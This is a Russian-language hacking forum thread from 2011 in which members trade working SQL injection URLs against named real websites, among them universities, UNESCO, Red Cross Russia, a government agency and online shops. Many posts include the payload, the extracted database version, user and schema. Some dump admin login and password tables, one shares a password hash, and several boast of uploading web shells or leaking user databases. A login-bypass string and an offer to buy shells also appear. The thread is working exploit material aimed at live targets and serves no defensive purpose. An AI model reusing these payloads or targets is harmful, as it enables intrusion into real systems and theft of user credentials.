http://www.soundtrackcovers.ru/catalogue.php?id=671-999.9+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
4.1.25

http://www.finances-pedagogie.fr/pages/publications.php?id=34-999.9+union+select+1,2,version(),4,5,6--

4.0.27-max-log
Pr 5

http://www.lavallart-associes.com/texte_publications.php?id=49-999.9+union+select+1,2,3,4,5,6,7,version()--

5.1.41-3ubuntu12

http://www.avance-org.fr/publications/publications.php?idFamille=2-999.9+union+select+1,2,3,4,5,6,version()--

5.0.32-Debian_7etch12-log

Cennarios
07.05.2011, 21:13
Заметно, что на сайте присутствует гей - тематика....

http://www.bayareareporter.org/news/article.php?sec=news&article=-5000+union+select+1,table_name,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7+from+information_schema.columns+where+column_name+like+%22%login%%22+limit+0,1--+

[RedSky]
07.05.2011, 23:24
Ситуация: инъекция в рефере, в инсерт запросе, вывод в ошибке.
Решение:
http://74auc.ru/index.php
referer: asd')on duplicate key update a=(select 1 from(select name_const(version(),1),name_const(version(),1))a)-- -

Osstudio
09.05.2011, 20:37
http://faraon.stfaraon.ru/site.php?id=30065+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x666172616f6e7374666172616f6e--

Megwarez
10.05.2011, 17:02
edu

http://art.colorado.edu/hiaff/section.php?id=-4+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7+from+information_schema.tables+--
pr6

http://www.adas-fusion.eu/theme.php?id=-3+union+select+1,2,3,group_concat%280x0b,table_name%29,5,6+from+information_schema.tables+--
pr5

Osstudio
10.05.2011, 18:52
http://www.weddingcards.ru/catalog.php5?catid=3+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4+from+information_schema.tables+where+table_schema=0x73697465736574755f776564--

ACCOUNT:BASKET:CATEGORY:ITEM:ORDER_SEQUENCE:PHOTO:SERVICE:SESSION_LOG:TEXT
Догадываетесь, какое поле взять?! ;)

Osstudio
10.05.2011, 21:21
http://www.globaltech.by/catalog.php?catId=7+and+1=0+union+select+group_concat%28concat_ws%280x3a3a3a,Id,name,login,pass,accesslevel,Id,name,login,pass,accesslevel%29+separator+0x0b%29+from+users+limit+0,20--&sId=35&item=222
----
http://www.dried.su/catalog.php?do=more&catid=3+and+1=0+union+select+1,2,group_concat%28concat_ws%280x3a3a3a,id,login,password,email,rights,new_password%29+separator+0x0b%29,4,5,6,7,8,9+from+cms_administrators+limit+0,20--&id=27

AC//DC
11.05.2011, 08:15
http://www.visiodance.ru/catalog/?dance=-1%20and%201=2%20union%20all%20select%201,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(char(58),@@version,user(),database()),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19+--

5.1.56-log visiodance@localhost visiodance

пассы не расшифровал.....дерзайте

Osstudio
11.05.2011, 14:48
http://www.aksline.ru/index.php?catid=11+and+1=0+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x616b736c696e65--
Дерзайте, поле с админкой прямо перед носом!

Cennarios
11.05.2011, 18:00
http://radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+&folder=people

Osstudio
11.05.2011, 19:35
http://www.iorta.com/catalog.php?catid=-47+and+1=0+union+select+unhex%28hex%28concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29%29%29,2--

rudi
11.05.2011, 23:20
очуметь
там 687 таблиц

AC//DC
12.05.2011, 05:53
http://www.fishres.ru/news/news.php?id=-18167+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database()),4,5,6,7,8,9+--

4.0.27-log murfish4_test@v28.valuehost.ru murfish4_test

Cennarios
12.05.2011, 08:55
http://www.opensys.ro/content.php?id=-16%27+union+select+1,2,3,version%28%29,5--+

Osstudio
12.05.2011, 13:49
Это ещё не так много) :D

Tigger
12.05.2011, 16:41
http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+

4.0.25:smdaily2@localhost:smdaily2

----------------------------

http://www.scooterpart.net/products.php?id=175+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+admins--+

---------------------------

http://www.repropaint.com/Davinci/detail.php?Id=368+and+1=2+UnIon+selECt+1,concat_ws(0x3a,id,naam,paswoord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+login--+

--------------------------

http://www.reichenwies.de/shop/product_details.php?id=65+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,u_name,u_password,u_privilege),4,5,6,7,8,9,10,11,12+from+fs_users--+

------------------------

http://www.racemotorparts.com/products.php?id=1053+and+1=2+UnIon+selECt+1,2,concat_ws(username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admins--+

----------------------

http://www.ppfmaster.ru/news.php?id=1+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--+

5.0.92-community-log:ppfmaste_admin@localhost:ppfmaste_news

----------------------

http://www.onlinewholesale.us/goods.php?id=143+and+1=2+union+select+1,2,3,concat_ws(0x3a,adminname,adminpass),5+from+w_admin--+

----------------------

http://www.olemiss.edu/debate/debate_news/details.php?id=58'+and+1=2+union+select+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7--+

5.1.30-log:cirlot@localhost:cirlot

Yupinder
12.05.2011, 17:44
http://100.tut.by/area.php?id=-20+UnIon+selECt+1,2,radio_account_login,4,5,radio_account_password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+radio_account+limit+0,1+--+

Osstudio
12.05.2011, 18:21
http://www.vw-club.ru/vw/news/show_news.php?id=700+and+1=0+union+select+1,hex%28database%28%29%29,3,4,5,6--

A_n_d_r_e_i
13.05.2011, 12:47
http://www.redcross.ru/news.php?nid=-190+union+select+1,2,3,4,group_concat(0x0b,login,0x3a,password)+from+redcross_sql.b_admin+--+
тиц: 250 пр: 5
File_Priv: no

winstrool
13.05.2011, 13:42
тиц:10 pr:5

4.1.22-standard:thefanli_backend:thefanli_senior@localhost

pr:3



4.1.24-max-log:asuntojafi:asuntojafi@216.69.186.161

pr:3

5.0.88:chiptec0:chiptec0@localhost

pr:3

5.0.92-community:algerie:sam@localhost

pr:1 тиц:30

5.0.70-log:gb_dogstatus:gb_dogstatus@81.176.226.110

st.gryphon
14.05.2011, 12:23
http://www.akkords.ru/news.php?nid=-8 union select 1,2,3,group_concat(concat_ws(0x3a,id,name,nick,mail,login,pass,band),'<br>'),5,6,7 FROM admin--

тиц 230

winstrool
14.05.2011, 18:02
БОЯН:

для тех кто не вкурсе, боян смотрим так:



pr:6 тиц:30
y12user@y12web4:5.1.35:y12doegov
pr:6

root@localhost:5.0.22:new

pr:6 тиц:30

4.1.11:webuser@localhost:public_relations

moodoone
16.05.2011, 16:58
https://www.dezinfector.ru/?new_id=-7+union+select+1,2,3,concat_ws%280x3a,login,password%29,5,6+from+drweb_cms_user--

bloodAngel
16.05.2011, 20:00
два шопи ))) http://www.tribbletoys.com/product_info.php?id=5-999.9+union+select+1,2,version(),database(),5,6,7,8,9,10--

5.0.91-log \**/tribbles

http://theshopnewyork.com/productinfo.php?id=1189-999.9+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

5.0.91-log \**/gomezny_products

Osstudio
16.05.2011, 22:18
documents:news:publications:vacancies

Osstudio
17.05.2011, 16:16
http://www.credit-center.ru/news.php?id_news=-92+union+select+1,version(),3,4,5--+
==
http://sibselmash.nsk.ru/news.php?id=150+and+1=0+union+select+1,database%28 %29,3,version%28%29,user%28%29,6,7--
==
http://www.nordsy.spb.ru/sv2/news.php?id=103+order+by+7--+

av1
18.05.2011, 15:16
http://www.batcon.org/index.php/all-about-bats/species-profiles.html?task=detail&species=-2160+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6--&country=43&state=all&family=all&limitstart=0

Username: beejbat_admin@10.10.10.136
Version: 5.0.77-log
Database: beejbat_vrc

Google PR: 7

http://www.batcon.org/administrator/

DezMond™
18.05.2011, 18:43
ТИЦ130 PR7
http://www.ircam.fr/media/scripts/calendrier/oai/oai2.php?verb=GetRecord&metadataPrefix=mods&identifier=oai:ircam.fr:programmation:281'+and+1=0+union+select+group_concat(concat_ws(0x3a3a,user,password)),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+--+

mix0x0
19.05.2011, 17:04
http://graffs.com.ua/index.php?page=products&shop=1&cat=19&scat=&sscat=64&id=-216+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=0x677261666673+--+

version: 5.5.9-log
database: graffs
user: graffs@hosting2.colocall.net

A_n_d_r_e_i
20.05.2011, 00:48
*Удаленно*
http://fmspk.ru/press.php?id=-10+union+select+1,2,3,group_concat(0x0b,name,0x3a,pass),5,6+from+usrpsw+--
File_Priv=no
ТИЦ 60 PR 2
Логиниться сразу на сайте, но там htpasswd :(
Да, простите что выложу пасс и логин, но я не могу сделать иначе. На таком серьезном ресурсе..
user:b89e5f6497323d36c7b00413d0ba15c6:писька
http://i010.radikal.ru/1105/97/72978ea51a06.jpg


Dr.Z3r0:
кто еще раз вставит картинку в пост со взломанного ресурса, тот получит банан

Osstudio
20.05.2011, 13:12
http://www.vs.com.ua/a-news/news.php?id=16+and+1=0+union+select+1,2,3,version%28%29,5,database%28%29,7,8,9,10--

Lindows
20.05.2011, 19:25
http://www.neilprydemaui.com/items.php?id=476+union+select+1,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11--

version: 5.1.41
database: neilprydemaui_2
user: neilprydemaui@localhost

Кроме этой базы там есть еще пару, можно слить базу пользователей форуме. (слил =) )

Osstudio
20.05.2011, 21:03
Там их 13 :)

Lindows
21.05.2011, 18:53
http://www.basicjokes.com/djoke.php?id=-886+union+select+1,concat_ws%280x3b,user%28%29,version%28%29,database%28%29%29--

version: 5.0.77
database: basicjok_Jokes
user: basicjok_jokes@localhost

Osstudio
21.05.2011, 21:22
http://www.srbm.ru/news.php?news_id=809+and+1=0+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Cennarios
22.05.2011, 14:32
http://www.unesco.org/archives/newsletters/cahiers/cahieritems.php?idArticle=15%20and%20row%281,1%29%3E%28select%20count%28*%29,concat%28version%28%29,0x3a,floor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29--

DIEZalok
22.05.2011, 16:47
http://sitemapnow.com/news.php?id=9' and !1 union select 1,mid(group_concat(concat_ws(0x3a, id, user, email, password)),1,1024),3,4,5,6,7 from sm_users-- -

http://sitemapnow.com/articles.php?id=10' and !1 union select 1,version(),3,4,5,6,7-- -

В форме входа
логин: ' or id=1-- -
пасс: уф

Osstudio
22.05.2011, 17:28
http://driverb.ru/news.php?id_news=55+and+1=0+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
P.S Отображается в title :)
А также там всего 8 БД, и это всё разные сайты, aaea.ru и т.д....уже на всех я залил шелл...

MetalKvantor
23.05.2011, 01:23
тИЦ:60

http://pingpong.su/info.php?sect_id&id=-1+union+select+all+1,2,group_concat(0x0b,login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+conf_users

MetalKvantor
23.05.2011, 03:01
http://sibabitur.ru/src8_vuz_catalog2.php?id=-1+union+select+all+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables


Дальше копаться не стал...

winstrool
23.05.2011, 15:34
pr 3 тиц 10

jurabek@208.109.162.156:4.1.20:jurabek

pr3 тиц 700

sedmoy_user@localhost:4.1.22-standard-log:sedmoy_db

pr5 тиц 425

paraav01@fe114.hc.ru:5.1.54-log:wwwparaaviscom

pr1 тиц 10

alexgroupe_7@localhost:5.0.81-community:alexgroupe_7

pr5 тиц 100

web_mediacia_com@zvm13.host.ru:4.0.27-log:web_mediacia_com

Lindows
23.05.2011, 20:16
http://www.zabudova.by/index.php?module=view_news&nid=37+union+select+1,2,concat_ws%280x3b,user%28%29,database%28%29,version%28%29%29,4,5,6--

http://www.svenskaspraket.org/pesni.php?id=-9+union+select+concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,2--

http://www.at-sib.ru/internet.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5--

http://zoorinok.com.ua/details_topic.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7--

http://www.nugabestrostov.ru/article.php?id=-9+union+select+1,concat_ws%280x3b,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11--

winstrool
23.05.2011, 22:49
pr 7 тиц 90

Microsoft SQL Server 2008 (SP2) - 10.0.4000.0 (X64) Sep 16 2010 19:43:16 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)

HellFire
24.05.2011, 08:12
Всякая левота:

http://www.waterfallsnorthwest.com/nws/waterfall.php?num=636-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),5,6,7,8,9--

PR: 5
Database Version: 5.0.91-log
Database name: waterfa
User name: sorefeet@cgi1204.int.bizland.net

http://www.simonlawpc.com/meettheattorneysdetail.php?id=1-100+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6--

PR: 3
Database Version: 4.1.22-log
Database name: simonlaw
User name: simonlawuser@localhost

winstrool
24.05.2011, 13:13
pr 3 тиц 10

5.0.91-community:cocktail_bar:cocktail_bar@localhost


5.0.51a-3ubuntu5.4:dicotaweb:dico45fg@localhost


5.0.91-community-log:vik0azis_nsp:vik0azis_vikuzr@localhost

pr 4

5.0.45-COMMUNITY:QUMERAN:QUMERAN@192.168.1.117


5.1.56-community-log:daytimer_haisun:daytimer_haisun@localhost

pr 3 тиц 10

5.0.90:pan_base:pan_base@localhost


5.1.50-lk-log:eshokcomua:eshokcomua@localhost

pr 2 тиц 10

5.0.77-log:tornados_tornado:tornados_tornado@localhost

pr 2

5.0.26-log:avtogradom:avtogradom@localhost

pr 2 тиц 30

5.0.77-log:uzg:uzg@localhost

mix0x0
24.05.2011, 20:05
http://www.intline.ru/shwplans.php?oid=-15+union+select+1,group_concat%28concat_ws%280x3a,login,password%29+separator+0x0b%29,3,4,5+from+admin+--+
version: 5.0.45-log
database: inetproj
user: intline@localhost

тИЦ: 60 | PR: 3
Страниц в Яндекс: 696
IP: 195.178.216.41 /Moscow
Reverse ip: intline.ru | mioo.ru


http://www.century21today.com/office.php?oID=-1+union+select+1,group_concat%28concat_ws%280x3a,username,password%29+separator+0x0b%29,3+from+adminaccounts+--+
version: 5.1.44-community
database: c21site
user: idx@localhost

PR: 2
Страниц в Яндекс: 905
IP: 216.55.163.25 /California

A_n_d_r_e_i
24.05.2011, 22:03
http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,host,0x3a,user,0x3a,password),8,9,10,11,12+from+mysql.user%20--
http://moskva.nightout.ru/vacancy/-3+union+select+1,2,3,4,5,6,group_concat(0x0b,id,0x3a,login,0x3a,password),8,9,10,11,12+from+inday_concepton.user%20--
File_Priv=Yes

Expl0ited
25.05.2011, 17:02
http://itc.virginia.edu/services/catServicesWithDesc.php?catID=0'union(select(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x))--+

TOP4
25.05.2011, 18:46
насканил сегодня=)

wkar
25.05.2011, 23:43
MySQL Info: u10283@10.8.1.181:5.0.90-log:u10283:binjportbld-freebsd7.3
Printable field: 9
Vuln URL: http://apcom.ru/ru/page/index.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

winstrool
27.05.2011, 11:45
pr 3 тиц 20

5.0.51a-24+lenny5:usbgifts:u_usbgifts@localhost

pr 1 тиц 10

5.0.92-community:ecoberco_data:ecoberco_clreco@localhost

pr 1 тиц 160

5.1.55:baker018_db0:baker018_db0@88.214.230.5

Megwarez
28.05.2011, 07:36
PR2 DMOZ
http://www.moseleytennisclub.co.uk/story.php?id=-1+union+select+1,group_concat%280x0b,table_name%29,3,4+from+information_schema.tables+--

totenkopf
28.05.2011, 08:48
http://www.virtualracesystem.co.uk/webpage.php?PageID=-3+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9+--+
dbo130187829@212.227.127.175:4.0.27-max-log:db130187829

http://www.lightpollution.org.uk/index.php?pageId=-5+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16+--+
admin@localhost:5.0.38-Ubuntu_0ubuntu1.4-log:lightPollution

http://www.congregationalinsurance.com/info_news.php?ID=185+AND+0+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8,9,10,11,12+--+
dbo260186357@localhost:4.0.27-standard:db260186357

http://www.vernonmorris.co.uk/product-detail.php?category=2&id=17'/**/AND/**/0/**/UNION/**/SELECT/**/concat_ws(0x3a,user(),version(),database())/*
p8urrows@localhost:5.0.27-community-nt:vernonmorris

http://www.knoydart.co.uk/display.php?category=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,binary(concat_ws(0x3a,user(),version(),database())),12,13,14,15+--+
knoydart@lsh505.securepod.com:4.1.11-Debian_4sarge8:knoydart

http://www.tiller.co.uk/index.php?sid=courses&GET_crsID=-17'/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user(),version(),database())+--+'
tiller_admin@localhost:5.0.92-community:tiller_awl

http://www.letmeplay.co.uk/content.php?sid=50'+AND+0+/*!union*/+/*!select*/+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8+--+
amymat_admin@localhost:5.1.52:amymat_site

winstrool
29.05.2011, 14:22
pr 2

5.0.91-community:lesvoisl_lesvoisl:lesvoisl_lsvUSR@localhost

pr 5

4.0.17-standard-log:5152_web:user5152@localhost

pr 3 тиц 50

5.1.41-log:huntworld_bs:huntworld_bs@10.1.57.139

pr 2 тиц 20

5.1.54:asterisk:asterisk@localhost

pr 1

5.1.50-rel11.4-log:itkin:itkin@localhost

ManyMax
29.05.2011, 14:34
сорри за офтоп, готов покупать у вас шелы в зоне edu

Cennarios
29.05.2011, 14:36
http://www.digiserv.biz/news/display_article.php?id=-36+union+select+1,user%28%29,3,4,5--+

MTV
29.05.2011, 17:03
http://kitareview.com/news.php?id=589 есть скуля)Но не могу кол-во полей определить.Кавычку ставишь,все на новой странице открывается.Люди объясните?

FlaktW
29.05.2011, 17:29
http://kitareview.com/news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))/*!having*/+min(0)+or+1--+

winstrool
29.05.2011, 18:18
pr 3 тиц 70

5.0.92-log:hotline_test11:hotline_base7802@localhost

pr 1 тиц 10

4.1.21-log:udb2156:Uwww2156S@localhost

pr 1

5.0.91-community-log:hillsrug_eberos:hillsrug_dba@localhost

pr 4

4.1.22:labio:labio@localhost

pr 6 тиц 10

164 таблици %)
5.0.51a-24+lenny1:agsafe:agsafe@localhost

pr 4

5.0.51a-24+lenny1:bearcage:bearcage@localhost


ROOT
так и не смог сюда шелл залить
pr5

5.0.85:ausvet:angus@localhost

pr 1

5.0.32-Debian_7etch5~bpo31+1:freephone_dancek:freephone_dancek@supremecenter20.com

pr 4

5.0.92-community:regplus_regplus:regplus_dbm@localhost

pr 6

5.0.84-0.dotdeb.0-log:FAQ_cfhss:fedcan2@localhost

Osstudio
30.05.2011, 13:08
http://www.marbel.ru/news/sob.php?id=44+and+1=0+union+select+1,2,3,database%28%29,version%28%29,6--
тИц 80

winstrool
30.05.2011, 17:12
pr 2ROOT
прочтите вниматильней ошибку :D

5.0.92-community:real_adminnewtemp:real_admin@rc3-int


4.1.25-log:snarfy_main:snarfy_snarfy@localhost

pr 3

4.1.22-log:gateway2_cms:pantera@localhost

Cennarios
30.05.2011, 17:26
https://unfccc.int/cc_inet/cc_inet/six_elements/international_cooperation/items/3527.php?displayPool=-984+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,group_concat%28schema_name%29,31,32,33,34,35,36,37+from+information_schema.schemata--+&lang=10%27

AC//DC
30.05.2011, 19:37
http://www.board.ivki.com/index.php?id_categ=-15%20and%201=2%20union%20select%201,2,3,4,5,6,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

5.1.53-LOG DOSKA@LEPKE.DREAMHOST.COM IVKI_BOARD PC-LINUX-GNU

winstrool
31.05.2011, 09:12
pr 5 тиц 10

4.0.26:pec_on_ca_simplecms:peconc@pec.on.ca

pr 1

5.0.22-Debian_0ubuntu6.06.11-log:Eastview:Eastview@localhost

pr 3

5.0.92-community:ste_site:ste_web@localhost



5.1.36-community-log:zoomprinting:root@localhost

durito
31.05.2011, 12:30
http://www.coshuk.com/html/news.php?ID=-47+UnIon+selECt+1,2,3,4,CONCAT%28user%28%29,%20CHAR%2832,45,32%29,%20version%28%29%29,6,7,8,9,10+--+

coshadmin@localhost - 5.0.51a-community-log

Koren
31.05.2011, 23:19
shop

http://www.proformancelogo.com/product.php?id=-317+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

http://www.dallasmustang.com/product.php?productid=1124+and+row%281,2%29in%28select+count%28*%29,concat%28%28select+table_name+from+information_schema.tables+limit+3,1%29,0x3a,floor%28rand%280%29*2%29%29as+a+from+information_schema.tables+x+group+by+a%29

ubi
02.06.2011, 13:33
http://www.wislaportal.pl/news.php?id=-20193'+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14+from+information_schema.tables+--+

PR 4

Какой то польский футбольный клуб чтоли.

Cennarios
03.06.2011, 03:16
http://www.platinum-hosting.net/index.php?page=-contact%27+union+select+1,2,user%28%29,4,5,6--+

OnlyOn
05.06.2011, 02:04
завтра еще дам. тут я не смог таблицу подобрать.
тут у нас блинд

shell_c0de
05.06.2011, 02:15
2OnlyOn прочитай первый пост =\

OnlyOn
05.06.2011, 02:40
Первую удалил.
По правилам вроде-бы все дальше ок. не боян. Указал инфу.
Подобрать таблицу и БД не получилось

mix0x0
05.06.2011, 10:32
Федеральная служба Российской Федерации по контролю за оборотом наркотиков
http://www.65.fskn.gov.ru/show_doc.php?id=-1+union+select++1,2,3,4,group_concat%280x3a,table_name%29,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=0x73616b68706f6c696365+--+

version: 5.0.82sp1-log
database: sakhpolice
user: sakhpolice@localhost

tables
banners,docs,faq,faq_n,gallery,users,vacancy,vote,vote_answers,vote_variants,wanted
пароли в открытом виде

OnlyOn
05.06.2011, 15:04
Раскрытие путей:



тИЦ 800, PR 6

Обург
05.06.2011, 20:13
http://www.xram-novatorov.ru/page.php?id='+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x3a,version(),database(),user())+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)--+

bloodAngel
05.06.2011, 20:19
http://www.avantage.spb.ru/catalog.php?ID=-28+union+select+1,version(),3,4,5,6--
5.0.77-log
Яндекс тИЦ 10
Яндекс Rank 2/6
Google PageRank 3/10

http://www.domivka.dp.ua/catalog.php?cat=1%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)
'5.0.91-community'
Яндекс тИЦ 10
Яндекс Rank 2/6

Google PageRank 1/10

AC//DC
06.06.2011, 11:10
http://uprava.org/section.php?id=19&sub_id=-167%20and%201=2%20union%20select%201,2,3,4,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os)+--

4.0.27-log uprava-org@fhe2.hoster.ru uprava-org portbld-freebsd7.0

OnlyOn
06.06.2011, 18:45
http://eurozvuk.ru/gallery/index.php?id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536+and+%27x%27%3D%27x

Яндекс тИЦ (CY) 70
Google PageRank (PR) 3

OnlyOn
06.06.2011, 19:20
http://gretta.ru/catalog/card.php?cat=palio&id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--+a


Яндекс тИЦ (CY) 100
Google PageRank (PR) 2

OnlyOn
06.06.2011, 19:33
http://landscrona.ru/tales/index.php?id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2Cconcat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--

Яндекс тИЦ (CY) 160
Google PageRank (PR) 3

OnlyOn
06.06.2011, 20:03
http://resurs.ua/index.php?id=2&more=21+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1

Яндекс тИЦ (CY) 30
Google PageRank (PR) 2

Тут БД с логин-пасс в открытом виде. Наслаждайтесь. Пару мыльников попалось с довольно таки крутыми доменами XD

durito
07.06.2011, 09:46
http://www.benzrealty.com.au/content.php?page_id=-8+/*!UnIon+selECt+version%28%29*/

5.1.52

Cennarios
07.06.2011, 19:15
http://crime-maps.org/documentation_centre/centre/newsletter/newsletter_issue.php?i_=-45+union+select+1,concat%28file_priv,0x3a3a,User%29,3+from+mysql.user+limit+0,1--+&a_=395

monstr3
07.06.2011, 19:26
Таким образом подбираем существующую таблицу:
Если ABCDEF заменить на USERS - запроспроходит.

Далее подбираем поля:
Если вместо pass написать password - запрос проходит.

foozzi
08.06.2011, 19:07
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,10,%2011,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+

winstrool
09.06.2011, 02:25
pr5 ТИЦ 20

fenetreeurope@localhost:5.0.45:dbfenetreeurope

pr1

buketizkonfet@localhost:5.1.51:buketizkonfet

pr2

buketizkonfet@localhost:5.1.51:buketizkonfet


kharkovapartment@localhost:4.0.27:kharkovapartment


drobinson@localhost:5.0.27:business_data

AC//DC
09.06.2011, 10:07
http://www.mogilev.biz/company/?r=-17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

5.1.44-community-log shuniamogilev@localhost mogilevbiz_mogilev unknown-linux-gnu

SpaceMan
09.06.2011, 20:00
http://www.white-ship.ru/index.php?id=7-999.9+union+select+1,2,3,version%28%29,5,6,7,8,9,10--
вывод в Title :)

SergioRezza
10.06.2011, 08:55
http://www.be-on.net/products.php?id=-230+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://housewives.org.ua/text.php?id=-692+union+select+1,2,3,4,version()--
http://jericho.org.ua/text.php?id=-682+union+select+1,2,3,4,version()--
http://www.tradevoyage.by/new.php?id=-142+union+select+1,2,3,4,version(),6,7,8,9,10--
http://www.thaiware.com/main/info.php?id=-2955+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,version()--
